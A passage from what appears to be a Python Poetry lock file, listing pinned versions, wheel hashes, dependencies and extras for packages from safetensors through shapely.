{file = "safetensors-0.4.0-pp39-pypy39_pp73-macosx_10_7_x86_64.whl", hash = "sha256:9849ea60c7e840bfdd6030ad454d4a6ba837b3398c902f15a30460dd6961c28c"},
{file = "safetensors-0.4.0-pp39-pypy39_pp73-macosx_11_0_arm64.whl", hash = "sha256:6c42623ae7045615d9eaa6877b9df1db4e9cc71ecc14bcc721ea1e475dddd595"},
{file = "safetensors-0.4.0-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:80cb8342f00f3c41b3b93b1a599b84723280d3ac90829bc62262efc03ab28793"},
{file = "safetensors-0.4.0-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d8c4f5ed4ede384dea8c99bae76b0718a828dbf7b2c8ced1f44e3b9b1a124475"},
{file = "safetensors-0.4.0-pp39-pypy39_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:40d7cf03493bfe75ef62e2c716314474b28d9ba5bf4909763e4b8dd14330c01a"},
{file = "safetensors-0.4.0-pp39-pypy39_pp73-musllinux_1_1_aarch64.whl", hash = "sha256:232029f0a9fa6fa1f737324eda98a700409811186888536a2333cbbf64e41741"},
{file = "safetensors-0.4.0-pp39-pypy39_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:9ed55f4a20c78ff3e8477efb63c8303c2152cdfb3bfea4d025a80f54d38fd628"},
{file = "safetensors-0.4.0.tar.gz", hash = "sha256:b985953c3cf11e942eac4317ef3db3da713e274109cf7cfb6076d877054f013e"},
]
[package.extras]
all = ["safetensors[jax]", "safetensors[numpy]", "safetensors[paddlepaddle]", "safetensors[pinned-tf]", "safetensors[quality]", "safetensors[testing]", "safetensors[torch]"]
dev = ["safetensors[all]"]
jax = ["flax (>=0.6.3)", "jax (>=0.3.25)", "jaxlib (>=0.3.25)", "safetensors[numpy]"]
numpy = ["numpy (>=1.21.6)"]
paddlepaddle = ["paddlepaddle (>=2.4.1)", "safetensors[numpy]"]
pinned-tf = ["safetensors[numpy]", "tensorflow (==2.11.0)"]
quality = ["black (==22.3)", "click (==8.0.4)", "flake8 (>=3.8.3)", "isort (>=5.5.4)"]
tensorflow = ["safetensors[numpy]", "tensorflow (>=2.11.0)"]
testing = ["h5py (>=3.7.0)", "huggingface_hub (>=0.12.1)", "hypothesis (>=6.70.2)", "pytest (>=7.2.0)", "pytest-benchmark (>=4.0.0)", "safetensors[numpy]", "setuptools_rust (>=1.5.2)"]
torch = ["safetensors[numpy]", "torch (>=1.10)"]
[[package]]
name = "scikit-learn"
version = "1.3.2"
description = "A set of python modules for machine learning and data mining"
optional = true
python-versions = ">=3.8"
files = [
{file = "scikit-learn-1.3.2.tar.gz", hash = "sha256:a2f54c76accc15a34bfb9066e6c7a56c1e7235dda5762b990792330b52ccfb05"},
{file = "scikit_learn-1.3.2-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:e326c0eb5cf4d6ba40f93776a20e9a7a69524c4db0757e7ce24ba222471ee8a1"},
{file = "scikit_learn-1.3.2-cp310-cp310-macosx_12_0_arm64.whl", hash = "sha256:535805c2a01ccb40ca4ab7d081d771aea67e535153e35a1fd99418fcedd1648a"},
{file = "scikit_learn-1.3.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1215e5e58e9880b554b01187b8c9390bf4dc4692eedeaf542d3273f4785e342c"},
{file = "scikit_learn-1.3.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0ee107923a623b9f517754ea2f69ea3b62fc898a3641766cb7deb2f2ce450161"},
{file = "scikit_learn-1.3.2-cp310-cp310-win_amd64.whl", hash = "sha256:35a22e8015048c628ad099da9df5ab3004cdbf81edc75b396fd0cff8699ac58c"},
{file = "scikit_learn-1.3.2-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:6fb6bc98f234fda43163ddbe36df8bcde1d13ee176c6dc9b92bb7d3fc842eb66"},
{file = "scikit_learn-1.3.2-cp311-cp311-macosx_12_0_arm64.whl", hash = "sha256:18424efee518a1cde7b0b53a422cde2f6625197de6af36da0b57ec502f126157"},
{file = "scikit_learn-1.3.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3271552a5eb16f208a6f7f617b8cc6d1f137b52c8a1ef8edf547db0259b2c9fb"},
{file = "scikit_learn-1.3.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fc4144a5004a676d5022b798d9e573b05139e77f271253a4703eed295bde0433"},
{file = "scikit_learn-1.3.2-cp311-cp311-win_amd64.whl", hash = "sha256:67f37d708f042a9b8d59551cf94d30431e01374e00dc2645fa186059c6c5d78b"},
{file = "scikit_learn-1.3.2-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:8db94cd8a2e038b37a80a04df8783e09caac77cbe052146432e67800e430c028"},
{file = "scikit_learn-1.3.2-cp312-cp312-macosx_12_0_arm64.whl", hash = "sha256:61a6efd384258789aa89415a410dcdb39a50e19d3d8410bd29be365bcdd512d5"},
{file = "scikit_learn-1.3.2-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cb06f8dce3f5ddc5dee1715a9b9f19f20d295bed8e3cd4fa51e1d050347de525"},
{file = "scikit_learn-1.3.2-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5b2de18d86f630d68fe1f87af690d451388bb186480afc719e5f770590c2ef6c"},
{file = "scikit_learn-1.3.2-cp312-cp312-win_amd64.whl", hash = "sha256:0402638c9a7c219ee52c94cbebc8fcb5eb9fe9c773717965c1f4185588ad3107"},
{file = "scikit_learn-1.3.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:a19f90f95ba93c1a7f7924906d0576a84da7f3b2282ac3bfb7a08a32801add93"},
{file = "scikit_learn-1.3.2-cp38-cp38-macosx_12_0_arm64.whl", hash = "sha256:b8692e395a03a60cd927125eef3a8e3424d86dde9b2370d544f0ea35f78a8073"},
{file = "scikit_learn-1.3.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:15e1e94cc23d04d39da797ee34236ce2375ddea158b10bee3c343647d615581d"},
{file = "scikit_learn-1.3.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:785a2213086b7b1abf037aeadbbd6d67159feb3e30263434139c98425e3dcfcf"},
{file = "scikit_learn-1.3.2-cp38-cp38-win_amd64.whl", hash = "sha256:64381066f8aa63c2710e6b56edc9f0894cc7bf59bd71b8ce5613a4559b6145e0"},
{file = "scikit_learn-1.3.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:6c43290337f7a4b969d207e620658372ba3c1ffb611f8bc2b6f031dc5c6d1d03"},
{file = "scikit_learn-1.3.2-cp39-cp39-macosx_12_0_arm64.whl", hash = "sha256:dc9002fc200bed597d5d34e90c752b74df516d592db162f756cc52836b38fe0e"},
{file = "scikit_learn-1.3.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1d08ada33e955c54355d909b9c06a4789a729977f165b8bae6f225ff0a60ec4a"},
{file = "scikit_learn-1.3.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:763f0ae4b79b0ff9cca0bf3716bcc9915bdacff3cebea15ec79652d1cc4fa5c9"},
{file = "scikit_learn-1.3.2-cp39-cp39-win_amd64.whl", hash = "sha256:ed932ea780517b00dae7431e031faae6b49b20eb6950918eb83bd043237950e0"},
]
[package.dependencies]
joblib = ">=1.1.1"
numpy = ">=1.17.3,<2.0"
scipy = ">=1.5.0"
threadpoolctl = ">=2.0.0"
[package.extras]
benchmark = ["matplotlib (>=3.1.3)", "memory-profiler (>=0.57.0)", "pandas (>=1.0.5)"]
docs = ["Pillow (>=7.1.2)", "matplotlib (>=3.1.3)", "memory-profiler (>=0.57.0)", "numpydoc (>=1.2.0)", "pandas (>=1.0.5)", "plotly (>=5.14.0)", "pooch (>=1.6.0)", "scikit-image (>=0.16.2)", "seaborn (>=0.9.0)", "sphinx (>=6.0.0)", "sphinx-copybutton (>=0.5.2)", "sphinx-gallery (>=0.10.1)", "sphinx-prompt (>=1.3.0)", "sphinxext-opengraph (>=0.4.2)"]
examples = ["matplotlib (>=3.1.3)", "pandas (>=1.0.5)", "plotly (>=5.14.0)", "pooch (>=1.6.0)", "scikit-image (>=0.16.2)", "seaborn (>=0.9.0)"]
tests = ["black (>=23.3.0)", "matplotlib (>=3.1.3)", "mypy (>=1.3)", "numpydoc (>=1.2.0)", "pandas (>=1.0.5)", "pooch (>=1.6.0)", "pyamg (>=4.0.0)", "pytest (>=7.1.2)", "pytest-cov (>=2.9.0)", "ruff (>=0.0.272)", "scikit-image (>=0.16.2)"]
[[package]]
name = "scipy"
version = "1.9.3"
description = "Fundamental algorithms for scientific computing in Python"
optional = true
python-versions = ">=3.8"
files = [
{file = "scipy-1.9.3-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:1884b66a54887e21addf9c16fb588720a8309a57b2e258ae1c7986d4444d3bc0"},
{file = "scipy-1.9.3-cp310-cp310-macosx_12_0_arm64.whl", hash = "sha256:83b89e9586c62e787f5012e8475fbb12185bafb996a03257e9675cd73d3736dd"},
{file = "scipy-1.9.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1a72d885fa44247f92743fc20732ae55564ff2a519e8302fb7e18717c5355a8b"},
{file = "scipy-1.9.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d01e1dd7b15bd2449c8bfc6b7cc67d630700ed655654f0dfcf121600bad205c9"},
{file = "scipy-1.9.3-cp310-cp310-win_amd64.whl", hash = "sha256:68239b6aa6f9c593da8be1509a05cb7f9efe98b80f43a5861cd24c7557e98523"},
{file = "scipy-1.9.3-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:b41bc822679ad1c9a5f023bc93f6d0543129ca0f37c1ce294dd9d386f0a21096"},
{file = "scipy-1.9.3-cp311-cp311-macosx_12_0_arm64.whl", hash = "sha256:90453d2b93ea82a9f434e4e1cba043e779ff67b92f7a0e85d05d286a3625df3c"},
{file = "scipy-1.9.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:83c06e62a390a9167da60bedd4575a14c1f58ca9dfde59830fc42e5197283dab"},
{file = "scipy-1.9.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:abaf921531b5aeaafced90157db505e10345e45038c39e5d9b6c7922d68085cb"},
{file = "scipy-1.9.3-cp311-cp311-win_amd64.whl", hash = "sha256:06d2e1b4c491dc7d8eacea139a1b0b295f74e1a1a0f704c375028f8320d16e31"},
{file = "scipy-1.9.3-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:5a04cd7d0d3eff6ea4719371cbc44df31411862b9646db617c99718ff68d4840"},
{file = "scipy-1.9.3-cp38-cp38-macosx_12_0_arm64.whl", hash = "sha256:545c83ffb518094d8c9d83cce216c0c32f8c04aaf28b92cc8283eda0685162d5"},
{file = "scipy-1.9.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0d54222d7a3ba6022fdf5773931b5d7c56efe41ede7f7128c7b1637700409108"},
{file = "scipy-1.9.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:cff3a5295234037e39500d35316a4c5794739433528310e117b8a9a0c76d20fc"},
{file = "scipy-1.9.3-cp38-cp38-win_amd64.whl", hash = "sha256:2318bef588acc7a574f5bfdff9c172d0b1bf2c8143d9582e05f878e580a3781e"},
{file = "scipy-1.9.3-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:d644a64e174c16cb4b2e41dfea6af722053e83d066da7343f333a54dae9bc31c"},
{file = "scipy-1.9.3-cp39-cp39-macosx_12_0_arm64.whl", hash = "sha256:da8245491d73ed0a994ed9c2e380fd058ce2fa8a18da204681f2fe1f57f98f95"},
{file = "scipy-1.9.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4db5b30849606a95dcf519763dd3ab6fe9bd91df49eba517359e450a7d80ce2e"},
{file = "scipy-1.9.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c68db6b290cbd4049012990d7fe71a2abd9ffbe82c0056ebe0f01df8be5436b0"},
{file = "scipy-1.9.3-cp39-cp39-win_amd64.whl", hash = "sha256:5b88e6d91ad9d59478fafe92a7c757d00c59e3bdc3331be8ada76a4f8d683f58"},
{file = "scipy-1.9.3.tar.gz", hash = "sha256:fbc5c05c85c1a02be77b1ff591087c83bc44579c6d2bd9fb798bb64ea5e1a027"},
]
[package.dependencies]
numpy = ">=1.18.5,<1.26.0"
[package.extras]
dev = ["flake8", "mypy", "pycodestyle", "typing_extensions"]
doc = ["matplotlib (>2)", "numpydoc", "pydata-sphinx-theme (==0.9.0)", "sphinx (!=4.1.0)", "sphinx-panels (>=0.5.2)", "sphinx-tabs"]
test = ["asv", "gmpy2", "mpmath", "pytest", "pytest-cov", "pytest-xdist", "scikit-umfpack", "threadpoolctl"]
[[package]]
name = "semver"
version = "3.0.2"
description = "Python helper for Semantic Versioning (https://semver.org)"
optional = true
python-versions = ">=3.7"
files = [
{file = "semver-3.0.2-py3-none-any.whl", hash = "sha256:b1ea4686fe70b981f85359eda33199d60c53964284e0cfb4977d243e37cf4bf4"},
{file = "semver-3.0.2.tar.gz", hash = "sha256:6253adb39c70f6e51afed2fa7152bcd414c411286088fb4b9effb133885ab4cc"},
]
[[package]]
name = "send2trash"
version = "1.8.2"
description = "Send file to trash natively under Mac OS X, Windows and Linux"
optional = false
python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,>=2.7"
files = [
{file = "Send2Trash-1.8.2-py3-none-any.whl", hash = "sha256:a384719d99c07ce1eefd6905d2decb6f8b7ed054025bb0e618919f945de4f679"},
{file = "Send2Trash-1.8.2.tar.gz", hash = "sha256:c132d59fa44b9ca2b1699af5c86f57ce9f4c5eb56629d5d55fbb7a35f84e2312"},
]
[package.extras]
nativelib = ["pyobjc-framework-Cocoa", "pywin32"]
objc = ["pyobjc-framework-Cocoa"]
win32 = ["pywin32"]
[[package]]
name = "sentence-transformers"
version = "2.2.2"
description = "Multilingual text embeddings"
optional = true
python-versions = ">=3.6.0"
files = [
{file = "sentence-transformers-2.2.2.tar.gz", hash = "sha256:dbc60163b27de21076c9a30d24b5b7b6fa05141d68cf2553fa9a77bf79a29136"},
]
[package.dependencies]
huggingface-hub = ">=0.4.0"
nltk = "*"
numpy = "*"
scikit-learn = "*"
scipy = "*"
sentencepiece = "*"
torch = ">=1.6.0"
torchvision = "*"
tqdm = "*"
transformers = ">=4.6.0,<5.0.0"
[[package]]
name = "sentencepiece"
version = "0.1.99"
description = "SentencePiece python wrapper"
optional = true
python-versions = "*"
files = [
{file = "sentencepiece-0.1.99-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:0eb528e70571b7c02723e5804322469b82fe7ea418c96051d0286c0fa028db73"},
{file = "sentencepiece-0.1.99-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:77d7fafb2c4e4659cbdf303929503f37a26eabc4ff31d3a79bf1c5a1b338caa7"},
{file = "sentencepiece-0.1.99-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:be9cf5b9e404c245aeb3d3723c737ba7a8f5d4ba262ef233a431fa6c45f732a0"},
{file = "sentencepiece-0.1.99-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:baed1a26464998f9710d20e52607c29ffd4293e7c71c6a1f83f51ad0911ec12c"},
{file = "sentencepiece-0.1.99-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:9832f08bb372d4c8b567612f8eab9e36e268dff645f1c28f9f8e851be705f6d1"},
{file = "sentencepiece-0.1.99-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:019e7535108e309dae2b253a75834fc3128240aa87c00eb80732078cdc182588"},
{file = "sentencepiece-0.1.99-cp310-cp310-win32.whl", hash = "sha256:fa16a830416bb823fa2a52cbdd474d1f7f3bba527fd2304fb4b140dad31bb9bc"},
{file = "sentencepiece-0.1.99-cp310-cp310-win_amd64.whl", hash = "sha256:14b0eccb7b641d4591c3e12ae44cab537d68352e4d3b6424944f0c447d2348d5"},
{file = "sentencepiece-0.1.99-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:6d3c56f24183a1e8bd61043ff2c58dfecdc68a5dd8955dc13bab83afd5f76b81"},
{file = "sentencepiece-0.1.99-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:ed6ea1819fd612c989999e44a51bf556d0ef6abfb553080b9be3d347e18bcfb7"},
{file = "sentencepiece-0.1.99-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:a2a0260cd1fb7bd8b4d4f39dc2444a8d5fd4e0a0c4d5c899810ef1abf99b2d45"},
{file = "sentencepiece-0.1.99-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8a1abff4d1ff81c77cac3cc6fefa34fa4b8b371e5ee51cb7e8d1ebc996d05983"},
{file = "sentencepiece-0.1.99-cp311-cp311-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:004e6a621d4bc88978eecb6ea7959264239a17b70f2cbc348033d8195c9808ec"},
{file = "sentencepiece-0.1.99-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:db361e03342c41680afae5807590bc88aa0e17cfd1a42696a160e4005fcda03b"},
{file = "sentencepiece-0.1.99-cp311-cp311-win32.whl", hash = "sha256:2d95e19168875b70df62916eb55428a0cbcb834ac51d5a7e664eda74def9e1e0"},
{file = "sentencepiece-0.1.99-cp311-cp311-win_amd64.whl", hash = "sha256:f90d73a6f81248a909f55d8e6ef56fec32d559e1e9af045f0b0322637cb8e5c7"},
{file = "sentencepiece-0.1.99-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:62e24c81e74bd87a6e0d63c51beb6527e4c0add67e1a17bac18bcd2076afcfeb"},
{file = "sentencepiece-0.1.99-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:57efcc2d51caff20d9573567d9fd3f854d9efe613ed58a439c78c9f93101384a"},
{file = "sentencepiece-0.1.99-cp36-cp36m-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6a904c46197993bd1e95b93a6e373dca2f170379d64441041e2e628ad4afb16f"},
{file = "sentencepiece-0.1.99-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d89adf59854741c0d465f0e1525b388c0d174f611cc04af54153c5c4f36088c4"},
{file = "sentencepiece-0.1.99-cp36-cp36m-win32.whl", hash = "sha256:47c378146928690d1bc106fdf0da768cebd03b65dd8405aa3dd88f9c81e35dba"},
{file = "sentencepiece-0.1.99-cp36-cp36m-win_amd64.whl", hash = "sha256:9ba142e7a90dd6d823c44f9870abdad45e6c63958eb60fe44cca6828d3b69da2"},
{file = "sentencepiece-0.1.99-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:b7b1a9ae4d7c6f1f867e63370cca25cc17b6f4886729595b885ee07a58d3cec3"},
{file = "sentencepiece-0.1.99-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d0f644c9d4d35c096a538507b2163e6191512460035bf51358794a78515b74f7"},
{file = "sentencepiece-0.1.99-cp37-cp37m-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c8843d23a0f686d85e569bd6dcd0dd0e0cbc03731e63497ca6d5bacd18df8b85"},
{file = "sentencepiece-0.1.99-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:33e6f690a1caebb4867a2e367afa1918ad35be257ecdb3455d2bbd787936f155"},
{file = "sentencepiece-0.1.99-cp37-cp37m-win32.whl", hash = "sha256:8a321866c2f85da7beac74a824b4ad6ddc2a4c9bccd9382529506d48f744a12c"},
{file = "sentencepiece-0.1.99-cp37-cp37m-win_amd64.whl", hash = "sha256:c42f753bcfb7661c122a15b20be7f684b61fc8592c89c870adf52382ea72262d"},
{file = "sentencepiece-0.1.99-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:85b476406da69c70586f0bb682fcca4c9b40e5059814f2db92303ea4585c650c"},
{file = "sentencepiece-0.1.99-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:cfbcfe13c69d3f87b7fcd5da168df7290a6d006329be71f90ba4f56bc77f8561"},
{file = "sentencepiece-0.1.99-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:445b0ec381af1cd4eef95243e7180c63d9c384443c16c4c47a28196bd1cda937"},
{file = "sentencepiece-0.1.99-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c6890ea0f2b4703f62d0bf27932e35808b1f679bdb05c7eeb3812b935ba02001"},
{file = "sentencepiece-0.1.99-cp38-cp38-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:fb71af492b0eefbf9f2501bec97bcd043b6812ab000d119eaf4bd33f9e283d03"},
{file = "sentencepiece-0.1.99-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:27b866b5bd3ddd54166bbcbf5c8d7dd2e0b397fac8537991c7f544220b1f67bc"},
{file = "sentencepiece-0.1.99-cp38-cp38-win32.whl", hash = "sha256:b133e8a499eac49c581c3c76e9bdd08c338cc1939e441fee6f92c0ccb5f1f8be"},
{file = "sentencepiece-0.1.99-cp38-cp38-win_amd64.whl", hash = "sha256:0eaf3591dd0690a87f44f4df129cf8d05d8a4029b5b6709b489b8e27f9a9bcff"},
{file = "sentencepiece-0.1.99-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:38efeda9bbfb55052d482a009c6a37e52f42ebffcea9d3a98a61de7aee356a28"},
{file = "sentencepiece-0.1.99-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:6c030b081dc1e1bcc9fadc314b19b740715d3d566ad73a482da20d7d46fd444c"},
{file = "sentencepiece-0.1.99-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:84dbe53e02e4f8a2e45d2ac3e430d5c83182142658e25edd76539b7648928727"},
{file = "sentencepiece-0.1.99-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0b0f55d0a0ee1719b4b04221fe0c9f0c3461dc3dabd77a035fa2f4788eb3ef9a"},
{file = "sentencepiece-0.1.99-cp39-cp39-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:18e800f206cd235dc27dc749299e05853a4e4332e8d3dfd81bf13d0e5b9007d9"},
{file = "sentencepiece-0.1.99-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2ae1c40cda8f9d5b0423cfa98542735c0235e7597d79caf318855cdf971b2280"},
{file = "sentencepiece-0.1.99-cp39-cp39-win32.whl", hash = "sha256:c84ce33af12ca222d14a1cdd37bd76a69401e32bc68fe61c67ef6b59402f4ab8"},
{file = "sentencepiece-0.1.99-cp39-cp39-win_amd64.whl", hash = "sha256:350e5c74d739973f1c9643edb80f7cc904dc948578bcb1d43c6f2b173e5d18dd"},
{file = "sentencepiece-0.1.99.tar.gz", hash = "sha256:189c48f5cb2949288f97ccdb97f0473098d9c3dcf5a3d99d4eabe719ec27297f"},
]
[[package]]
name = "setuptools"
version = "67.8.0"
description = "Easily download, build, install, upgrade, and uninstall Python packages"
optional = false
python-versions = ">=3.7"
files = [
{file = "setuptools-67.8.0-py3-none-any.whl", hash = "sha256:5df61bf30bb10c6f756eb19e7c9f3b473051f48db77fddbe06ff2ca307df9a6f"},
{file = "setuptools-67.8.0.tar.gz", hash = "sha256:62642358adc77ffa87233bc4d2354c4b2682d214048f500964dbe760ccedf102"},
]
[package.extras]
docs = ["furo", "jaraco.packaging (>=9)", "jaraco.tidelift (>=1.4)", "pygments-github-lexers (==0.0.5)", "rst.linker (>=1.9)", "sphinx (>=3.5)", "sphinx-favicon", "sphinx-hoverxref (<2)", "sphinx-inline-tabs", "sphinx-lint", "sphinx-notfound-page (==0.8.3)", "sphinx-reredirects", "sphinxcontrib-towncrier"]
testing = ["build[virtualenv]", "filelock (>=3.4.0)", "flake8-2020", "ini2toml[lite] (>=0.9)", "jaraco.envs (>=2.2)", "jaraco.path (>=3.2.0)", "pip (>=19.1)", "pip-run (>=8.8)", "pytest (>=6)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=2.4)", "pytest-cov", "pytest-enabler (>=1.3)", "pytest-mypy (>=0.9.1)", "pytest-perf", "pytest-ruff", "pytest-timeout", "pytest-xdist", "tomli-w (>=1.0.0)", "virtualenv (>=13.0.0)", "wheel"]
testing-integration = ["build[virtualenv]", "filelock (>=3.4.0)", "jaraco.envs (>=2.2)", "jaraco.path (>=3.2.0)", "pytest", "pytest-enabler", "pytest-xdist", "tomli", "virtualenv (>=13.0.0)", "wheel"]
[[package]]
name = "sgmllib3k"
version = "1.0.0"
description = "Py3k port of sgmllib."
optional = true
python-versions = "*"
files = [
{file = "sgmllib3k-1.0.0.tar.gz", hash = "sha256:7868fb1c8bfa764c1ac563d3cf369c381d1325d36124933a726f29fcdaa812e9"},
]
[[package]]
name = "shapely"
version = "2.0.2"
description = "Manipulation and analysis of geometric objects"
optional = true
python-versions = ">=3.7"
files = [
{file = "shapely-2.0.2-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:6ca8cffbe84ddde8f52b297b53f8e0687bd31141abb2c373fd8a9f032df415d6"},
{file = "shapely-2.0.2-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:baa14fc27771e180c06b499a0a7ba697c7988c7b2b6cba9a929a19a4d2762de3"},
{file = "shapely-2.0.2-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:36480e32c434d168cdf2f5e9862c84aaf4d714a43a8465ae3ce8ff327f0affb7"},
{file = "shapely-2.0.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4ef753200cbffd4f652efb2c528c5474e5a14341a473994d90ad0606522a46a2"},
{file = "shapely-2.0.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a9a41ff4323fc9d6257759c26eb1cf3a61ebc7e611e024e6091f42977303fd3a"},
{file = "shapely-2.0.2-cp310-cp310-win32.whl", hash = "sha256:72b5997272ae8c25f0fd5b3b967b3237e87fab7978b8d6cd5fa748770f0c5d68"},
{file = "shapely-2.0.2-cp310-cp310-win_amd64.whl", hash = "sha256:34eac2337cbd67650248761b140d2535855d21b969d76d76123317882d3a0c1a"},
{file = "shapely-2.0.2-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:5b0c052709c8a257c93b0d4943b0b7a3035f87e2d6a8ac9407b6a992d206422f"},
{file = "shapely-2.0.2-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:2d217e56ae067e87b4e1731d0dc62eebe887ced729ba5c2d4590e9e3e9fdbd88"},
{file = "shapely-2.0.2-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:94ac128ae2ab4edd0bffcd4e566411ea7bdc738aeaf92c32a8a836abad725f9f"},
{file = "shapely-2.0.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fa3ee28f5e63a130ec5af4dc3c4cb9c21c5788bb13c15e89190d163b14f9fb89"},
{file = "shapely-2.0.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:737dba15011e5a9b54a8302f1748b62daa207c9bc06f820cd0ad32a041f1c6f2"},
{file = "shapely-2.0.2-cp311-cp311-win32.whl", hash = "sha256:45ac6906cff0765455a7b49c1670af6e230c419507c13e2f75db638c8fc6f3bd"},
{file = "shapely-2.0.2-cp311-cp311-win_amd64.whl", hash = "sha256:dc9342fc82e374130db86a955c3c4525bfbf315a248af8277a913f30911bed9e"},
{file = "shapely-2.0.2-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:06f193091a7c6112fc08dfd195a1e3846a64306f890b151fa8c63b3e3624202c"},
{file = "shapely-2.0.2-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:eebe544df5c018134f3c23b6515877f7e4cd72851f88a8d0c18464f414d141a2"},
{file = "shapely-2.0.2-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:7e92e7c255f89f5cdf777690313311f422aa8ada9a3205b187113274e0135cd8"},
{file = "shapely-2.0.2-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:be46d5509b9251dd9087768eaf35a71360de6afac82ce87c636990a0871aa18b"},
{file = "shapely-2.0.2-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a5533a925d8e211d07636ffc2fdd9a7f9f13d54686d00577eeb11d16f00be9c4"},
{file = "shapely-2.0.2-cp312-cp312-win32.whl", hash = "sha256:084b023dae8ad3d5b98acee9d3bf098fdf688eb0bb9b1401e8b075f6a627b611"},
{file = "shapely-2.0.2-cp312-cp312-win_amd64.whl", hash = "sha256:ea84d1cdbcf31e619d672b53c4532f06253894185ee7acb8ceb78f5f33cbe033"},
